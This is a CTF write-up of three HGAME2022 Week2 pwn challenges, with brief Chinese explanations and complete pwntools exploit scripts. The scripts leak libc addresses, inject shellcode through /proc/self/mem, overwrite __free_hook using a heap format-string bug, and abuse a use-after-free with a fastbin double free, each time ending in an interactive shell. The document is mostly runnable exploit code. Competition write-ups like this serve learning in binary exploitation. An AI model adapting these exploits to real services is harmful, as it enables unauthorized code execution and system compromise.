PWN-COMPETITION-HGAME2022-Week2
- blind
- echo_sever
- oldfashion_note
blind
访问/proc/self/mem即可修改当前进程的内存,.text段也是可修改的
程序开始的时候直接输出了write的地址,泄露libc,然后在__libc_start_main上喷射shellcode
# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
# Challenge "blind": the service leaks write()'s address, then (judging by the three
# prompts answered below) takes a file path, an offset and data to write. Writing through
# /proc/self/mem ignores page protections, so even .text / libc code becomes writable
# (see the note above). Appears to be a Python 2 script: asm() output is concatenated
# with a str "\n" at the end.
context.log_level="debug"
context.arch="amd64"
context.os="linux"
io=remote("chuj.top",51739)
libc=ELF("./libc6_2.27-3ubuntu1.4_amd64.so")
# Proof-of-work gate: find a 4-character printable string whose sha256 hex digest equals
# the server's challenge. method='fixed' makes mbruteforce try exactly length-4 candidates.
io.recvuntil("sha256(????) == ")
code=io.recvuntil("\n")[:-1]
charset = string.printable
proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
io.sendlineafter("????> ",proof)
# The service prints write()'s runtime address; subtracting the symbol offset from the
# matching libc build yields the load base. This single pointer leak is what defeats ASLR.
io.recvuntil("write: ")
write_addr=int(io.recvuntil("\n")[:-1],16)
print("write_addr=="+hex(write_addr))
libc_base=write_addr-libc.sym["write"]
__libc_start_main=libc_base+libc.sym["__libc_start_main"]
# Target file is the process's own memory; the offset is the absolute address of
# __libc_start_main inside the mapped libc.
io.sendlineafter(">> ", "/proc/self/mem\x00")
io.sendlineafter(">> ", str(__libc_start_main))
# 0x300 bytes: rjust pads on the left, so this is a NOP sled followed by shellcraft.sh();
# execution entering anywhere in the sled reaches the shell. The trailing "\n" presumably
# terminates the server's read.
payload=asm(shellcraft.sh()).rjust(0x300, asm("nop")) +"\n"
io.sendafter(">> ", payload)
io.interactive()
echo_sever
堆上的格式化字符串漏洞
当输入的v0为0时,realloc(ptr,0)相当于free(ptr)
于是考虑将free_hook写为one-gadget
# -*- coding:utf-8 -*-
from pwn import *
import hashlib
# Challenge "echo_sever": format-string bug on a heap buffer. Each round the program asks
# for a length, reads that many bytes and uses them as the printf format. Sending length 0
# makes realloc(ptr,0) behave as free(ptr) (see the note above), which is the trigger for
# the __free_hook overwrite assembled below. Appears to be a Python 2 script (str payloads).
context.log_level="debug"
io=process("./echo")
#io=remote("chuj.top",52100)
elf=ELF("./echo")
libc=ELF("./libc-2.31.so")
#io_base = io.libs()[io.cwd + io.argv[0].strip('.')]
#offset=0x129F
#gdb.attach(io,"b * "+str(io_base+offset))
#pause()

# Generator of every length-`num` string over the alphabet `str` (recursive cartesian
# product). Only needed for the remote proof-of-work, which is commented out for this
# local run.
def get_pwd(str, num):
    if(num == 1):
        for x in str:
            yield x
    else:
        for x in str:
            for y in get_pwd(str, num-1):
                yield x+y

# Printable ASCII alphabet 0x21..0x7e for the proof-of-work brute force.
strKey=""
for i in range(33,127):
    strKey+=chr(i)

#io.recvuntil("sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#for x in get_pwd(strKey,4):
# h=hashlib.sha256()
# h.update(x.encode(encoding='utf-8'))
# h_hexdigest=h.hexdigest()
# if h_hexdigest==code:
# io.sendline(x)
# break

# Leak libc base, a stack address and the program base in one round by printing
# positional arguments 13, 15 and 17 with %p. The format is NUL-padded to 100 bytes.
payload="%13$p.%15$p.%17$p.".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
io.recvuntil("0x")
# Arg 13 is presumably the return address into __libc_start_main (hence the -243 adjustment).
libc_base=int(io.recvuntil(".")[:-1],16)-243-libc.sym["__libc_start_main"] # libc base
print("libc_base=="+hex(libc_base))
io.recvuntil("0x")
stack_addr=int(io.recvuntil(".")[:-1],16) # stack address
print("stack_addr=="+hex(stack_addr))
io.recvuntil("0x")
proc_base=int(io.recvuntil(".")[:-1],16)-elf.sym["main"] # program base (arg 17 holds &main)
print("proc_base=="+hex(proc_base))
free_hook=libc_base+libc.sym["__free_hook"] # __free_hook address
print("free_hook=="+hex(free_hook))
oggs=[0xe6c7e,0xe6c81,0xe6c84]
ogg=libc_base+oggs[0] # one-gadget address
print("ogg=="+hex(ogg))

# Write primitive, as inferred from the %15$hn/%43$hn and %6$hn/%10$hn pairings (confirm
# against the real stack layout): "%<val>c%<k>$hn" prints val characters and then stores
# the low 16 bits of the count through the pointer printf reads as arg k. Arg 15 points at
# the slot read as arg 43; re-aiming that slot at stack_addr-0xB0, +2 and +4 lets the
# following %43$hn writes deposit free_hook two bytes at a time into the slot read as
# arg 21, so %21$hn then writes directly into __free_hook. Note that .ljust(100,"\x00")
# binds only to the trailing "%..$hn" literal, so each message is 100 bytes plus the prefix;
# the length prompt is answered with the actual len(payload).

# Write the low 2 bytes of ogg at free_hook
#
addr1=stack_addr-0xB0
addr1=addr1&0xffff
payload="%"+str(addr1)+"c"+"%15$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr2=free_hook&0xffff
payload="%"+str(addr2)+"c"+"%43$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr3=stack_addr-0xB0+2
addr3=addr3&0xffff
payload="%"+str(addr3)+"c"+"%15$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr4=(free_hook>>16)&0xffff
payload="%"+str(addr4)+"c"+"%43$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr5=stack_addr-0xB0+4
addr5=addr5&0xffff
payload="%"+str(addr5)+"c"+"%15$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr6=(free_hook>>32)&0xffff
payload="%"+str(addr6)+"c"+"%43$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr7=(ogg)&0xffff
payload="%"+str(addr7)+"c"+"%21$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
##########################################################################################
# Write the middle 2 bytes of ogg at free_hook+2 (same pattern via the arg 6 -> arg 10 chain)
#
addr1=stack_addr-0xB0
addr1=addr1&0xffff
payload="%"+str(addr1)+"c"+"%6$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr2=(free_hook+2)&0xffff
payload="%"+str(addr2)+"c"+"%10$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr7=(ogg>>16)&0xffff
payload="%"+str(addr7)+"c"+"%21$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
##########################################################################################
# Write the high 2 bytes of ogg at free_hook+4
#
addr1=stack_addr-0xB0
addr1=addr1&0xffff
payload="%"+str(addr1)+"c"+"%6$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr2=(free_hook+4)&0xffff
payload="%"+str(addr2)+"c"+"%10$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
#
addr7=(ogg>>32)&0xffff
payload="%"+str(addr7)+"c"+"%21$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
# Send 0 so realloc(ptr,0) behaves as free(ptr): this invokes __free_hook, now the one-gadget.
io.sendlineafter("length:\n>> ",str(0))
#pause()
io.interactive()
oldfashion_note
delete_note函数存在UAF和double free漏洞
UAF可以泄露libc基址
double free可以让新的chunk能够malloc到free_hook地址处
写free_hook为system,于是free("/bin/sh\x00")相当于system("/bin/sh\x00"),从而getshell
from pwn import *
import hashlib
# Challenge "oldfashion_note": delete_note leaves the pointer in place (UAF) and allows
# deleting the same index twice (double free), see the note above. Appears to be a
# Python 2 script: ljust(8,'\x00') is applied to the received str/bytes.
context.log_level="debug"
io=process("./note")
#io=remote("chuj.top",51585)
elf=ELF("./note")
libc=ELF("./libc-2.31.so")

# Generator of every length-`num` string over the alphabet `str`; only needed for the
# remote proof-of-work, which is commented out for this local run.
def get_pwd(str, num):
    if(num == 1):
        for x in str:
            yield x
    else:
        for x in str:
            for y in get_pwd(str, num-1):
                yield x+y

# Printable ASCII alphabet 0x21..0x7e for the proof-of-work brute force.
strKey=""
for i in range(33,127):
    strKey+=chr(i)

#io.recvuntil(b"sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#for x in get_pwd(strKey,4):
# h=hashlib.sha256()
# h.update(x.encode(encoding='utf-8'))
# h_hexdigest=h.hexdigest()
# if h_hexdigest==code:
# io.sendline(x)
# break

# Menu wrappers: option 1 allocates a note (index, size, content), 2 shows it, 3 deletes it.
def alloc(idx,size,content):
    io.sendlineafter(">> ","1")
    io.recvuntil("index?\n>> ")
    io.sendline(str(idx))
    io.recvuntil("size?\n>> ")
    io.sendline(str(size))
    io.recvuntil("content?\n>> ")
    io.sendline(content)

def free(idx):
    io.sendlineafter(">> ","3")
    io.recvuntil("index?\n>> ")
    io.sendline(str(idx))

def show(idx):
    io.sendlineafter(">> ","2")
    io.recvuntil("index?\n>> ")
    io.sendline(str(idx))

# Stage 1 - libc leak through the UAF. Seven frees fill the tcache bin for this size; the
# eighth chunk (index 7, too large for fastbins) lands in the unsorted bin with its fd
# pointing into main_arena. show(7) still prints the freed chunk, and 0x1ebbe0 is
# presumably that main_arena offset in this libc-2.31 build.
for i in range (7):
    alloc(i,0x100,'aaaa')
alloc(7,0x100,'aaaa')
alloc(8,0x20,'/bin/sh\x00')
for i in range (7):
    free(i)
free(7)
show(7)
libc_base=u64(io.recvuntil('\n')[:-1].ljust(8,'\x00'))-0x1ebbe0
print("libc_base=="+hex(libc_base))
system=libc_base+libc.sym["system"]
print("system=="+hex(system))
free_hook=libc_base+libc.sym["__free_hook"]
print("free_hook=="+hex(free_hook))

# Stage 2 - double free into the fastbin. Fill the 0x50 tcache bin again, then free
# indices 7, 8, 7: the fastbin's head-only double-free check does not see the repeat,
# so chunk 7 is now linked twice.
for i in range (7):
    alloc(i,0x50,'aaaa')
alloc(7,0x50,'aaaa')
alloc(8,0x50,'aaaa')
alloc(9,0x20,'/bin/sh\x00')
for i in range (7):
    free(i)
free(7)
free(8)
free(7)

# Stage 3 - drain the tcache, then write free_hook into the doubly-linked chunk so the
# corrupted free list points at __free_hook. The three p64(free_hook) allocations walk
# that list until the fourth (index 13) is served __free_hook itself and receives
# system's address; the exact count depends on the tcache/fastbin interplay in this
# glibc and was presumably tuned empirically.
for i in range (7):
    alloc(i,0x50,'aaaa')
alloc(10,0x50,p64(free_hook))
alloc(11,0x50,p64(free_hook))
alloc(12,0x50,p64(free_hook))
alloc(13,0x50,p64(system))
# Deleting the note that holds "/bin/sh" now calls __free_hook("/bin/sh"), i.e. system("/bin/sh").
free(9)
io.interactive()